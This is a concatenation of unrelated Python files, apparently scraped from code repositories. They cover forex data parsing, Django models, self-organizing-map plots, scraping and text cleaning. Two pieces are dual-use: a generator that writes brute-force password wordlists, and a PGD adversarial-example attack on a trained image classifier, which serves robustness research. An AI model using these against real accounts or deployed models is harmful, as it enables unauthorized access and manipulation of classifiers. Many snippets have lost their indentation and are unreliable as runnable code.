feature_value_distribution_dict[feature_id] = (max_value, min_value, pos_average, neg_average, zero_num)
# write everything to file
with open ('feature_value_distribution_dict.txt', 'w', encoding = 'utf-8') as f:
feature_value_distribution_list = list(feature_value_distribution_dict.items())
for feature_id, value_tuple in feature_value_distribution_list:
max_value = value_tuple[0]
min_value = value_tuple[1]
pos_average = value_tuple[2]
neg_average = value_tuple[3]
zero_num = value_tuple[4]
f.write("Feature_id: {}, max: {}, min: {}, pos_average: {}, neg_average: {}, zero_num: {}"
.format(feature_id, max_value, min_value, pos_average, neg_average, zero_num))
f.write('\n')
def read_onanda_data(self):
def compute_std(day, day_forex_list, feature, i, instrument):
variance_list = []
for j in range(day):
feature_value = day_forex_list[i-j][feature]
if feature == 'openMid':
if instrument == 'USD_JPY':
feature_value *= 10
else:
feature_value *= 1000
elif feature == 'volume':
feature_value /= 1000
variance_list.append(feature_value)
std = np.std(variance_list)
std = float("{:3.1f}".format(std))
#oanda_logger.debug("instrument: {}, feature :{}, variance: {}".format(instrument, feature, std))
return std
'''read oanda data via online api to dict with several features'''
ignore_date_num = 7
for instrument in self.instruments_list:
            # self.url was already formatted with self.instrument in __init__,
            # so the old "#instrument" placeholder no longer exists; swap the
            # configured pair for the one being iterated instead.
            url = self.url.replace(self.instrument, instrument)
response = requests.get(url)
response_status_code = response.status_code
print("response_status_code: ", response_status_code)
day_forex_list = dict(response.json())['candles']
#print (day_forex_list)
for i, day_forex_dict in enumerate(day_forex_list):
if self.mode == 'testing':
if i < ignore_date_num or i > len(day_forex_list) - 1 - ignore_date_num: # -1-7
continue
elif self.mode == 'trading':
if i < ignore_date_num:
continue
time = day_forex_dict['time']
time = re.findall(r'([0-9]+-[0-9]+-[0-9]+)', time)[0]
time_list = time.split('-')
# switch year with day, day with month
time_list[0], time_list[2] = time_list[2], time_list[0]
time_list[0], time_list[1] = time_list[1], time_list[0]
time = '/'.join(time_list)
## getting features
# openMid
openMid = day_forex_dict['openMid']
openMid_1_day_ago = day_forex_list[i - 1]['openMid']
openMid_1_day_percent = float("{:2.2f}".format(100*((openMid - openMid_1_day_ago)/ openMid)))
openMid_3_day_std = compute_std(3, day_forex_list, 'openMid', i, instrument)
openMid_7_day_std = compute_std(7, day_forex_list, 'openMid', i, instrument)
# highMid
highMid = day_forex_dict['highMid']
highMid_1_day_ago = day_forex_list[i - 1]['highMid']
highMid_1_day_percent = float("{:2.2f}".format(100*((highMid - highMid_1_day_ago) / highMid)))
# lowMid
lowMid = day_forex_dict['lowMid']
lowMid_1_day_ago = day_forex_list[i - 1]['lowMid']
lowMid_percent = float("{:2.2f}".format(100*((lowMid - lowMid_1_day_ago)/ lowMid)))
# closeMid
if self.mode == 'trading':
closeMid = day_forex_dict['closeMid']
closeMid_1_day_ago = day_forex_list[i - 1]['closeMid']
closeMid_1_day_later = 0.0
closeMid_3_day_later = 0.0
closeMid_7_day_later = 0.0
closeMid_1_day_percent = float("{:2.2f}".format(100*((closeMid - closeMid_1_day_ago)/ closeMid)))
elif self.mode == 'testing':
closeMid = day_forex_dict['closeMid']
closeMid_1_day_ago = day_forex_list[i - 1]['closeMid']
closeMid_1_day_later = day_forex_list[i + 1]['closeMid']
closeMid_3_day_later = day_forex_list[i + 3]['closeMid']
closeMid_7_day_later = day_forex_list[i + 7]['closeMid']
closeMid_1_day_percent = float("{:2.2f}".format(100*((closeMid - closeMid_1_day_ago)/ closeMid)))
# volume
volume = day_forex_dict['volume']
volume_1_day_ago = day_forex_list[i - 1]['volume']
volume_1_day_percent = float("{:2.2f}".format(100*((volume - volume_1_day_ago)/ volume)))
volume_3_day_std = compute_std(3, day_forex_list, 'volume', i, instrument)
volume_7_day_std = compute_std(7, day_forex_list, 'volume', i, instrument)
# profit
if self.mode == 'trading':
profit_1_day = 0.0
profit_3_day = 0.0
profit_7_day = 0.0
elif self.mode == 'testing':
profit_1_day = float("{:2.3f}".format(100*((closeMid_1_day_later - closeMid) / closeMid)))
profit_3_day = float("{:2.3f}".format(100*((closeMid_3_day_later - closeMid) / closeMid)))
profit_7_day = float("{:2.3f}".format(100*((closeMid_7_day_later - closeMid) / closeMid)))
# custom feature
if highMid - lowMid == 0:
real_body_percent = 0.0
upper_shadow_percent = 0.0
lower_shadow_percent = 0.0
else:
real_body_percent = float("{:2.2f}".format(100*abs((openMid - closeMid) / (highMid - lowMid))))
upper_shadow_percent = float("{:2.2f}".format(100*abs((highMid - openMid) / (highMid - lowMid))))
lower_shadow_percent = float("{:2.2f}".format(100*abs((closeMid - lowMid) / (highMid - lowMid))))
# 1,AA,1/14/2011,$16.71,$16.71,$15.64,$15.97,242963398,-4.42849,1.380223028,239655616,$16.19,$15.79,
# -2.47066,19,0.187852
day_forex_tuple = ('_', instrument, time, openMid_1_day_percent, highMid_1_day_percent, lowMid_percent,
closeMid_1_day_percent, volume, volume_1_day_percent, openMid_3_day_std,
openMid_7_day_std, volume_3_day_std, volume_7_day_std,
real_body_percent, upper_shadow_percent, lower_shadow_percent, profit_1_day,
profit_3_day, profit_7_day, openMid)
self.forex_data_dict[instrument].append(day_forex_tuple)
def new_read_data_from_onanda(self):
def compute_std(day, day_forex_list, feature, i, instrument):
variance_list = []
for j in range(day):
feature_value = day_forex_list[i-j][feature]
if feature == 'openMid':
if instrument == 'USD_JPY':
feature_value *= 10
else:
feature_value *= 1000
elif feature == 'volume':
feature_value /= 1000
variance_list.append(feature_value)
std = np.std(variance_list)
std = float("{:3.1f}".format(std))
#oanda_logger.debug("instrument: {}, feature :{}, variance: {}".format(instrument, feature, std))
return std
'''read oanda data via online api to dict with several features'''
ignore_date_num = 7
instrument = self.instrument
url = self.url
response = requests.get(url)
response_status_code = response.status_code
print("response_status_code: ", response_status_code)
day_forex_list = dict(response.json())['candles']
#print (day_forex_list)
for i, day_forex_dict in enumerate(day_forex_list):
if self.mode == 'testing':
if i < ignore_date_num or i > len(day_forex_list) - 1 - ignore_date_num: # -1-7
continue
elif self.mode == 'trading':
if i < ignore_date_num:
continue
time = day_forex_dict['time']
time = re.findall(r'([0-9]+-[0-9]+-[0-9]+)', time)[0]
time_list = time.split('-')
# switch year with day, day with month
time_list[0], time_list[2] = time_list[2], time_list[0]
time_list[0], time_list[1] = time_list[1], time_list[0]
time = '/'.join(time_list)
## getting features
# openMid
openMid = day_forex_dict['openMid']
# highMid
highMid = day_forex_dict['highMid']
# lowMid
lowMid = day_forex_dict['lowMid']
# closeMid
closeMid = day_forex_dict['closeMid']
# volume
volume = day_forex_dict['volume']
day_forex_tuple = (instrument, time, openMid, closeMid, highMid, lowMid, volume)
self.forex_data_dict[instrument].append(day_forex_tuple)
|
# This is a program which generates password list
import itertools
f = open("wordlist.txt","w")
capletters = ["A","B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"]
smallletters = ["a","b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t","u","v","w", "x", "y" ,"z"]
numbers = ["1","2", "3", "4", "5", "6", "7", "8", "9", "0"]
symbols = ["@", "%", "&", "*", "(",")","#","!"]
choice = 0
def xselections(items, n):
    # Yields every length-n selection of items, with repetition allowed.
    if n == 0:
        yield []
    else:
        for i in range(len(items)):
            for ss in xselections(items, n - 1):
                yield [items[i]] + ss
while int(choice) not in range(1,15):
    choice = input('''
1) Numbers
2) Capital Letters
3) Lowercase Letters
4) Numbers + Capital Letters
5) Numbers + Lowercase Letters
6) Numbers + Capital Letters + Lowercase Letters
7) Capital Letters + Lowercase Letters
8) Numbers + symbols
9) Capital Letters + symbols
10) Lowercase letters + symbols
11) Numbers + Capital Letters + symbols
12) Numbers + Lowercase letters + symbols
13) Numbers + Capital letters + Lowercase letters + symbols
14) Capital letters + Lowercase letters + symbols
: ''')
choice = int(choice)
mlist = []
if choice == 1:
mlist = numbers
elif choice == 2:
mlist = capletters
elif choice == 3:
mlist = smallletters
elif choice == 4:
mlist = numbers + capletters
elif choice == 5:
    mlist = numbers + smallletters
elif choice == 6:
mlist = numbers + capletters + smallletters
elif choice == 7:
mlist = capletters + smallletters
elif choice == 8:
mlist = numbers + symbols
elif choice == 9:
mlist = capletters + symbols
elif choice == 10:
mlist = smallletters + symbols
elif choice == 11:
    mlist = numbers + capletters + symbols
elif choice == 12:
    mlist = numbers + smallletters + symbols
elif choice == 13:
mlist = numbers + capletters + smallletters + symbols
elif choice == 14:
mlist = capletters + smallletters + symbols
MIN = int(input("What is the min size of the word? "))
MAX = int(input("What is the max size of the word? "))
for i in range(MIN, MAX + 1):
    for s in xselections(mlist, i):
        f.write(''.join(s) + '\n')
f.close()
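# Note: since itertools is already imported, xselections(mlist, i) enumerates
# exactly the same sequences as itertools.product(mlist, repeat=i), which
# could replace the recursive generator above.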
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ctrl_citylist import CitylistCtrl
from common.cache import pop_portal_id
if __name__ == '__main__':
while True:
portal_id = pop_portal_id()
print(portal_id)
clc = CitylistCtrl(portal_id = portal_id)
clc.entry()
|
from modules import cell as c, explosion as ex, explosive as exive
class Empty(c.Cell, exive.Explosive):
def __init__(self, position):
self._position = position
@property
def position(self):
return self._position
    @position.setter
    def position(self, position):  # the setter must reuse the property's name
        self._position = position
def explode(self, gamefield, ex_type, user):
gamefield[self._position.y][self._position.x] = ex.Explosion(
self._position, ex_type=ex_type, user=user)
def should_continue_explode(self, ex_type):
return True
@property
def extra_range(self):
return 0
def action(self, gamefield, tick_time):
return
def contact(self, user):
return
def is_passable(self, user):
return True
@property
def image_name(self):
return None
|
from rest_framework import serializers
from .models import Transaction, PolicyRule, PolicyRuleDestination
class TransactionSerializer(serializers.ModelSerializer):
class Meta:
model = Transaction
fields = ['id', 'amount', 'destination', 'outgoing']
class PolicyRuleDestinationSerializer(serializers.ModelSerializer):
class Meta:
model = PolicyRuleDestination
fields = ['address']
def to_internal_value(self, data):
return {'address': data}
def to_representation(self, instance):
return instance.address
class PolicyRuleSerializer(serializers.ModelSerializer):
destinations = PolicyRuleDestinationSerializer(many=True, required=False, allow_null=True)
class Meta:
model = PolicyRule
fields = ['id', 'amount', 'destinations']
def create(self, validated_data):
        dests_data = validated_data.pop('destinations', None)  # optional field
rule = PolicyRule.objects.create(**validated_data)
if dests_data:
for dest_data in dests_data:
PolicyRuleDestination.objects.create(rule=rule, **dest_data)
return rule
    def update(self, instance, validated_data):
        dests_data = validated_data.pop('destinations', None)  # optional field
        instance.amount = validated_data['amount']
        instance.save()  # persist the amount change
# to support additions and deletions, clear out all destinations
PolicyRuleDestination.objects.filter(rule_id=instance.id).delete()
# re-add destinations according to request data
if dests_data:
for dest_data in dests_data:
PolicyRuleDestination.objects.create(rule=instance, **dest_data)
return instance
|
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from matplotlib import cm
from matplotlib.colors import Normalize
from tensorflow import keras
from som_keras.classification import classify_SOM, cluster_SOM
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
def visualize_labels(model, data=None, labels=None, bsize=32,
normalize=False, lab_names=None, **kwargs):
    '''
    Assigns each data sample to a neuron in the SOM's 2D grid. For each position
    in the grid, displays the label with the most occurrences.
    data: (tf tensor) input data in format (n_samples x n_features)
    labels: (tf tensor) with the corresponding labels
    bsize: (int) batch size when evaluating
    normalize: (bool) whether to divide the counts by the total amount
               of samples of each label respectively. Recommended
               for unbalanced datasets.
    lab_names: (list) if not None, uses this list to construct a legend.
    returns
        f: the matplotlib AxesImage returned by plt.imshow
    '''
# If SOM grid has not been classified yet, uses input
# to perform the classification
if model.counts is None:
assert(data is not None and labels is not None)
classify_SOM(model, data, labels, bsize, normalize)
f = plt.imshow(model.labels.reshape((model.dim_len[0], model.dim_len[1])), **kwargs)
if lab_names is not None:
labs = np.unique(model.labels)
# In case some neurons do not have label
if -1 in labs:
lab_names = ['Not assigned']+lab_names
# Get color for each label
colors = [f.cmap(f.norm(lab)) for lab in labs]
patches = [mpatches.Patch(color=colors[i], label=lab_names[i]) for i in range(len(labs))]
plt.legend(handles=patches, bbox_to_anchor=(1.75, 1))
return f
def visualize_histograms(model, data=None, labels=None, bsize=32,
normalize=False, **kwargs):
    '''
    Works like visualize_labels, but instead plots the histogram of labels
    at each position of the grid.
    data: (tf tensor) input data in format (n_samples x n_features)
    labels: (tf tensor) with the corresponding labels
    bsize: (int) batch size when evaluating
    normalize: (bool) whether to divide the counts by the total amount
               of samples of each label respectively. Recommended
               for unbalanced datasets.
    returns:
        f: (matplotlib figure)
    '''
if model.counts is None:
assert(data is not None and labels is not None)
classify_SOM(model, data, labels, bsize, normalize)
labs = model.counts.shape[1]
f = plt.figure()
for i, count in enumerate(model.counts):
ax = f.add_subplot(model.dim_len[0], model.dim_len[1], i+1)
ax.bar(np.arange(labs), count, **kwargs)
plt.xticks([])
        plt.yticks([])
    return f
def plot_dimred_pca(model, pca_data=None, connect=False,
use_labels=False, get_projs=False,
lab_names=None, **kwargs):
'''
Uses PCA to represent the grid's weights in a 2D space.
pca_data: If not None, uses this data to perform the PCA
Otherwise, it uses the weights.
connect: whether to connect adjacent nodes on the grid.
use_labels: if True and SOM neurons have been classified
using classify SOM, it plots each point with
a color corresponding to its class.
get_projs: whether to return the projections (True)
or the 2D plot (False)
**kwargs: extra arguments for PCA
returns
f: matplotlib figure
'''
weights = model.w.numpy().T
# Fit PCA
pca = PCA(n_components=2, **kwargs)
if pca_data is not None:
pca.fit(pca_data)
else:
pca.fit(weights)
exp_var = pca.explained_variance_ratio_
print(f'Component 1 - Var_ratio = {exp_var[0]:.2f} , Component 2 - Var_ratio = {exp_var[1]:.2f}')
# Return weights
projs = pca.transform(weights)
if get_projs:
return projs
# Plot weights
f = plt.figure()
if not use_labels:
plt.scatter(projs[:, 0], projs[:, 1])
else:
assert(model.labels is not None)
plt.scatter(projs[:, 0], projs[:, 1], c=model.labels)
# Show legend if labels are given
if lab_names is not None:
if len(np.unique(model.labels)) > len(lab_names):
lab_names = ['Not assigned'] + lab_names
norm = Normalize(vmin=-1, vmax=len(lab_names)-2)
else:
norm = Normalize(vmin=0, vmax=len(lab_names)-1)
scatters = []
for i in np.unique(model.labels):
color = cm.viridis(norm(i))
scat = plt.scatter(projs[model.labels == i, 0], projs[model.labels == i, 1], color=color)
scatters.append(scat)
plt.legend(scatters, lab_names)
plt.xlabel(f'Principal Component 1 ({100*exp_var[0]:.0f}%)')
plt.ylabel(f'Principal Component 2 ({100*exp_var[1]:.0f}%)')
if connect:
adjmat = model._construct_adjmat(False).toarray()
for i, row in enumerate(adjmat):
for j, entry in enumerate(row):
if entry > 0:
plt.plot([projs[i, 0], projs[j, 0]], [projs[i, 1], projs[j, 1]], '-k')
return f
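# Hypothetical usage sketch: project the grid with PCA, colored by class and
# with edges drawn between adjacent neurons:
#   f = plot_dimred_pca(model, connect=True, use_labels=True, lab_names=names)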
def plot_dimred_tsne(model, connect=False, get_projs=False,
use_labels=False, lab_names=None, **kwargs):
'''
Uses TSNE to represent the grid's weights in a 2D space.
connect: whether to connect adjacent nodes on the grid.
use_labels: if True and SOM neurons have been classified
using classify SOM, it plots each point with
a color corresponding to its class.
get_projs: whether to return the projections (True)
or the 2D plot (False)
**kwargs: extra arguments for TSNE
returns:
f: matplotlib figure
'''
weights = model.w.numpy().T
# Project using TSNE
tsne = TSNE(n_components=2, **kwargs)
projs = tsne.fit_transform(weights)
    print(f'Number of iterations: {tsne.n_iter_:.0f}, Final KLD: {tsne.kl_divergence_:.4f}')
if get_projs:
return projs
# Plot weights
f = plt.figure()
if not use_labels:
plt.scatter(projs[:, 0], projs[:, 1])
else:
assert(model.labels is not None)
plt.scatter(projs[:, 0], projs[:, 1], c=model.labels)
# Show legend if labels are given
if lab_names is not None:
if len(np.unique(model.labels)) > len(lab_names):
lab_names = ['Not assigned'] + lab_names
norm = Normalize(vmin=-1, vmax=len(lab_names)-2)
else:
norm = Normalize(vmin=0, vmax=len(lab_names)-1)
scatters = []
for i in np.unique(model.labels):
color = cm.viridis(norm(i))
scat = plt.scatter(projs[model.labels == i, 0], projs[model.labels == i, 1], color=color)
scatters.append(scat)
plt.legend(scatters, lab_names)
if connect:
adjmat = model._construct_adjmat(False).toarray()
for i, row in enumerate(adjmat):
for j, entry in enumerate(row):
if entry > 0:
plt.plot([projs[i, 0], projs[j, 0]], [projs[i, 1], projs[j, 1]], '-k')
return f
def plot_class_prototypes(prototypes, features_dim1, features_dim2,
labs_x = None, labs_y = None,
plot_shape=None, lab_names=None,
figure=None, **kwargs):
'''
prototypes: class prototypes with shape (num_classes, num_features)
features_dim1: number of features on the x axis
features_dim2: number of features on the y axis
    labs_x: labels for the rows (features_dim1), shown on the y axis
    labs_y: labels for the columns (features_dim2), shown on the x axis
plot_shape: shape of the image representing the features
lab_names: list of names of each label
**kwargs: arguments for imshow
'''
if figure is None:
figure = plt.figure(None, (35, 15))
if plot_shape is None:
plot_shape = [1, prototypes.shape[0]]
for i, prototype in enumerate(prototypes):
ax = figure.add_subplot(plot_shape[0], plot_shape[1], i+1)
ax.imshow(prototype.reshape((features_dim1, features_dim2)), **kwargs)
if labs_y is not None:
ax.set_xticks(np.arange(features_dim2), minor=False)
ax.xaxis.tick_top()
ax.set_xticklabels(labs_y, minor=False)
if labs_x is not None:
ax.set_yticks(np.arange(features_dim1), minor=False)
ax.set_yticklabels(labs_x, minor=False)
if lab_names is not None:
plt.title(lab_names[i])
def _grid_to_Umat(model, idxs):
neurons_row = model.dim_len[1]
Umat_rowlen = 2*model.dim_len[1]-1
# Get vertical and horizontal distances
hdist = (idxs[1]-idxs[0])%neurons_row*np.sign(idxs[1]-idxs[0])
vdist = (idxs[1]-idxs[0])//neurons_row
# Get idx[0]'s position on the Umat
pos = 2*idxs[0]+(Umat_rowlen-1)*(idxs[0]//neurons_row)
# Add distances to index
Umat_idx = pos+hdist+vdist*Umat_rowlen
return Umat_idx
def get_Umat(model, mean_dist=True, connect8=True):
'''
Builds the U-matrix corresponding to the trained grid.
mean_dist: if True, matrix has same shape as grid and at each
neuron, the mean distance to its neighbours is
represented. Otherwise the matrix is bigger and
distances corresponding to all connections are represented
surrounding the neurons (which have value 0)
connect8: whether to consider diagonal connections as neighbours.
'''
# Get distance from each weight to the rest
all_dists = model._distance_matrix(tf.transpose(model.w)).numpy()
# For each neuron, get its neighbours
adj_mat = model._construct_adjmat(connect8).toarray()
if mean_dist:
# Set distances to non adjacent neurons to 0
neig_dists = all_dists*adj_mat
# Compute mean distance
Umat_flat = np.sum(neig_dists, axis=1)/np.sum(neig_dists > 0, axis=1)
Umat = Umat_flat.reshape((model.dim_len[0], model.dim_len[1]))
else:
# Get distances only corresponding to neighbours
pair_idx = np.indices((model.dim_len[0]*model.dim_len[1],
model.dim_len[0]*model.dim_len[1]))
pair_idx = np.transpose(pair_idx, [1, 2, 0])
pair_idx = pair_idx[adj_mat.astype(bool)]
neig_dists = all_dists[adj_mat.astype(bool)]
# Filter repeated distances
valid = pair_idx[:, 0] <= pair_idx[:, 1]
neig_dists = neig_dists[valid]
pair_idx = pair_idx[valid]
# Translate indices from grid to U-mat indices
        neig_indices = np.apply_along_axis(lambda pair: _grid_to_Umat(model, pair), 1, pair_idx)
# Build U-matrix using distances and indices
Umat = np.zeros((2*model.dim_len[0]-1)*(2*model.dim_len[1]-1))
Umat[neig_indices] = neig_dists
Umat = Umat.reshape((2*model.dim_len[0]-1, 2*model.dim_len[1]-1))
return Umat
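# Hypothetical usage sketch: visualize the U-matrix of a trained SOM:
#   Umat = get_Umat(model, mean_dist=True)
#   plt.imshow(Umat); plt.colorbar(); plt.show()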
def plot_cluster_dists(model, nclusts, data_pos, data_labs,
lab_names=None, get_means=True,
figure=None, **kwargs):
'''
For each cluster plots the amount of samples of each class in it.
model: SOM model
nclusts: number of clusters to use
data_pos: input's data predicted positions in the SOM grid
data_labs: input's data corresponding labels
lab_names: names for the different labels
get_means: whether to also compute each cluster mean
**kwargs: arguments for plt.bar
returns:
means: (np array) if get_means is True returns array of
cluster means of shape (n_clusters x n_features)
'''
# Predict cluster labels for SOM and data
clust_SOM = cluster_SOM(model, nclusts)
clust_data = clust_SOM[data_pos]
# Vector to store each cluster mean
weights = model.w.numpy().T
means = np.zeros((len(np.unique(clust_SOM)), weights.shape[1]))
if figure is None:
figure = plt.figure(None, (35, 15))
for clust in np.unique(clust_SOM):
        # Count occurrences of each class
counts = np.zeros(len(np.unique(data_labs)))
for i, lab in enumerate(np.unique(data_labs)):
counts[i] = np.sum(data_labs[clust_data == clust] == lab)
# Bar plot
        figure.add_subplot(int(np.ceil(nclusts / 3)), 3, clust + 1)
if lab_names is None:
lab_names = np.unique(data_labs)
plt.bar(lab_names, counts, **kwargs)
plt.title(f'Cluster {clust:.0f}')
# Compute cluster mean
means[clust] = np.mean(weights[clust_SOM == clust], axis=0)
if get_means:
return means
|
# Generated by Django 2.2.1 on 2019-05-07 04:25
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('portalapp', '0002_auto_20190507_0424'),
]
operations = [
migrations.RenameField(
model_name='points',
old_name='efoort',
new_name='effort',
),
]
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies simplest-possible build of a "Hello, world!" program
using an explicit build target of 'hello'.
"""
import TestGyp
test = TestGyp.TestGyp(workdir='workarea_target')
test.run_gyp('hello.gyp')
test.build('hello.gyp', 'hello')
test.run_built_executable('hello', stdout="Hello, world!\n")
test.up_to_date('hello.gyp', 'hello')
test.pass_test()
|
import nltk
import re
nltk.download('punkt')
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
def stripTags(pageContents): # Removes the headers of the html
startLoc = pageContents.find('<p>')
endLoc = pageContents.find('<br/>')
pageContents = pageContents[startLoc:endLoc]
return pageContents
def deleteTags(pageContents): # Removes the remaining html components that do not correspond to the original text
    text = []
    inside = 0  # must be initialized before the loop, or the first non-'<' char raises NameError
    for char in pageContents:
        if char == '<':
            inside = 1
        elif inside == 1 and char == '>':
            inside = 0
        elif inside == 1:
            continue
        else:
            text += char
    return text
def deleteStopwords(text): # This function removes the stop words
    text_tokens = word_tokenize(text)
    # Assumes English text; the original called stopwords.words() with no
    # language, which loads the stopword lists for every language.
    tokens = [word for word in text_tokens if word not in stopwords.words('english')]
    weird_characters = ["\\xc2\\xa0", "\r\n\t\t\t\t\t"]
    tokens_clean = [word for word in tokens if word not in weird_characters]
    return re.compile(r'\W+', re.UNICODE).split(" ".join(tokens_clean))
#return tokens_clean
def cleaner(query, number_of_files):
    query = str(number_of_files) + "_" + query
    with open(query + "_full_text.txt", 'r') as opener:
        original_text = opener.read()
    text = stripTags(original_text)
    text = deleteTags(text)
    text = "".join(text)
    text = ' '.join(text.split())
    text = deleteStopwords(text)
    text = " ".join(text)
    with open(query + "_cleaned.txt", 'a') as fl:
        fl.write(text)
|
import requests
import urllib.parse as urlparse
from bs4 import BeautifulSoup
import pandas as pd
import time
import os
base_url = 'https://www.uta-net.com/'
url_by_artist = 'https://www.uta-net.com/artist/2750/4/'
response = requests.get(url_by_artist)
soup = BeautifulSoup(response.text, 'lxml')
links = soup.find_all('td', class_='side td1')
def get_lyrics(url):
time.sleep(1)
response = requests.get(url)
soup = BeautifulSoup(response.text, 'lxml')
song_title = soup.find('div', class_='title').get_text().replace('\n','')
    # Lyrics detail page
song_lyrics = soup.find('div', itemprop='lyrics')
song_lyric = song_lyrics.text
song_lyric = song_lyric.replace('\n','')
return song_title,song_lyric
def scraping(url_by_artist, f_path):
df = pd.DataFrame()
base_url = 'https://www.uta-net.com/'
response = requests.get(url_by_artist)
soup = BeautifulSoup(response.text, 'lxml')
links = soup.find_all('td', class_='side td1')
titles = []
lyrics = []
for link in links:
_url = urlparse.urljoin(base_url,link.a.get('href'))
song_title,song_lyric = get_lyrics(_url)
titles.append(song_title)
lyrics.append(song_lyric)
df['title'] = titles
df['lyric'] = lyrics
df.to_pickle(f_path)
def main():
# yuming
url_by_artist = 'https://www.uta-net.com/artist/2750/4/'
f_path = '../../data/lyrics/m.matsutouya/lyrics.pkl'
scraping(url_by_artist,f_path)
# miyuki oneisama
url_by_artist = 'https://www.uta-net.com/artist/3315/4/'
f_path = '../../data/lyrics/m.nakajima/lyrics.pkl'
scraping(url_by_artist,f_path)
main()
|
import os
import logging
logger = logging.getLogger(__name__)
from django.conf.global_settings import MEDIA_ROOT
from django.db import models
from audited_models.models import AuditedModel
from .version import Version
class ApprovedProjectManager(models.Manager):
"""Custom project manager that shows only approved records."""
def get_query_set(self):
"""Query set generator"""
return super(
ApprovedProjectManager, self).get_query_set().filter(
approved=True)
class UnapprovedProjectManager(models.Manager):
"""Custom project manager that shows only unapproved records."""
def get_query_set(self):
"""Query set generator"""
return super(
UnapprovedProjectManager, self).get_query_set().filter(
approved=False)
class Project(AuditedModel):
"""A project model e.g. QGIS, InaSAFE etc."""
name = models.CharField(
help_text='Name of this project.',
max_length=255,
null=False,
blank=False,
unique=True)
image_file = models.ImageField(
help_text=('A logo image for this project. '
'Most browsers support dragging the image directly on to the '
'"Choose File" button above.'),
upload_to=os.path.join(MEDIA_ROOT, 'images/projects'),
blank=True)
approved = models.BooleanField(
help_text='Whether this project has been approved for use yet.',
default=False
)
objects = ApprovedProjectManager()
all_objects = models.Manager()
unapproved_objects = UnapprovedProjectManager()
class Meta:
app_label = 'changes'
def __unicode__(self):
return u'%s' % self.name
def versions(self):
"""Get all the versions for this project."""
qs = Version.objects.filter(project=self).order_by('name')
return qs
|
#-*-coding:utf8-*-
from lxml import etree
htmlsrc = '''
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<div id="content">
<ul id="useful">
<li>abc1</li>
<li>abc2</li>
</ul>
<ul id="useless">
<li>没用1</li>
<li>没用2</li>
</ul>
<div id="url">
<a href="http://www.douban.com">douban</a>
<a href="http://www.baidu.com" title="baidu">百度</a>
</div>
</div>
</body>
</html>
'''
selector = etree.HTML(htmlsrc)
content = selector.xpath('//ul[@id="useful"]/li/text()')
for item in content:
print item
print ''
link = selector.xpath('//a/@href')
for item in link:
print item
print ''
title = selector.xpath('//a/@title')
print title[0]
print ''
cn = selector.xpath('//a/text()')
for item in cn:
print item.encode('utf-8')
|
# -*- coding: utf-8 -*-
"""
@author: Zhen-Wang
This script runs a PGD attack against a trained baseline model to generate adversarial examples.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import os
from tensorflow.examples.tutorials.mnist import input_data
#import cifar10_input
class LinfPGDAttack:
def __init__(self, model, epsilon, num_steps, step_size, random_start):
"""Attack parameter initialization. The attack performs k steps of
size a, while always staying within epsilon from the initial
point."""
self.model = model
self.epsilon = epsilon
self.num_steps = num_steps
self.step_size = step_size
self.rand = random_start
loss = tf.reduce_sum(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=model.logit, labels=model.y_input))
        # tf.gradients returns a list; take the first element, the array of derivatives w.r.t. x_input
self.grad = tf.gradients(loss, model.x_input)[0]
def perturb(self, x_nat, y, sess):
"""Given a set of examples (x_nat, y), returns a set of adversarial
examples within epsilon of x_nat in l_infinity norm."""
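        # Added note: each PGD iterate below is
        #   x <- clip(x + step_size * sign(grad_x loss), x_nat - epsilon, x_nat + epsilon)
        # followed by a clip to the valid pixel range.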
if self.rand:
x = x_nat + np.random.uniform(-self.epsilon, self.epsilon, x_nat.shape)
x = np.clip(x, 0, 255) # ensure valid pixel range
else:
x = np.copy(x_nat)
for i in range(self.num_steps):
grad = sess.run(self.grad, feed_dict={self.model.x_input: x,
self.model.y_input: y})
x = np.add(x, self.step_size * np.sign(grad), out=x, casting='unsafe')
x = np.clip(x, x_nat - self.epsilon, x_nat + self.epsilon)
x = np.clip(x, 0, 255) # ensure valid pixel range
return x
if __name__ == '__main__':
import sys
import math
from model_lib import MobileNet
#model_dir = "models/natural_alexnet"
#model_dir = "models/robust_alexnet"
data_path = '/public/home/cjy/Documents/Dataset/DNN/fashion_data'
model_dir = '/public/home/cjy/Documents/Python/DNN/code-mnist/mobilenet_eval/models-f/robust_mobilenet'
model_file = tf.train.latest_checkpoint(model_dir)
if model_file is None:
print('No model found')
sys.exit()
model = MobileNet(is_training=True)
attack = LinfPGDAttack(model = model,
                           epsilon = 0.3,  # 1.0 for CIFAR-10
num_steps = 10,
step_size = 2.0,
random_start = 1)
saver = tf.train.Saver()
mnist = input_data.read_data_sets(data_path, one_hot=False)
os.environ['CUDA_VISIBLE_DEVICES'] = '3'
gpuconfig = tf.ConfigProto()
gpuconfig.gpu_options.allow_growth = True
with tf.Session(config=gpuconfig) as sess:
# Restore the checkpoint
saver.restore(sess, model_file)
print("restore checkpoint:{}".format(model_file))
# Iterate over the samples batch-by-batch
num_eval_examples = 10000
eval_batch_size = 200
num_batches = int(math.ceil(num_eval_examples / eval_batch_size))
x_adv = [] # adv accumulator
print('Iterating over {} batches'.format(num_batches))
for ibatch in range(num_batches):
bstart = ibatch * eval_batch_size
bend = min(bstart + eval_batch_size, num_eval_examples)
print('batch size: {}'.format(bend - bstart))
x_batch = mnist.test.images[bstart:bend, :]
y_batch = mnist.test.labels[bstart:bend]
x_batch_adv = attack.perturb(x_batch, y_batch, sess)
x_adv.append(x_batch_adv)
print('Storing examples')
path = "/public/home/cjy/Documents/Python/DNN/code-mnist/mobilenet_eval/fashion-robust-attack.npy"
x_adv = np.concatenate(x_adv, axis=0)
np.save(path, x_adv)
print('Examples stored in {}'.format(path))
|
#!/usr/bin/python3.4
# -*-coding:Utf-8
prenoms = ["Anthony", "Mathilde", "Simon", "Mateu", "Ugo"]
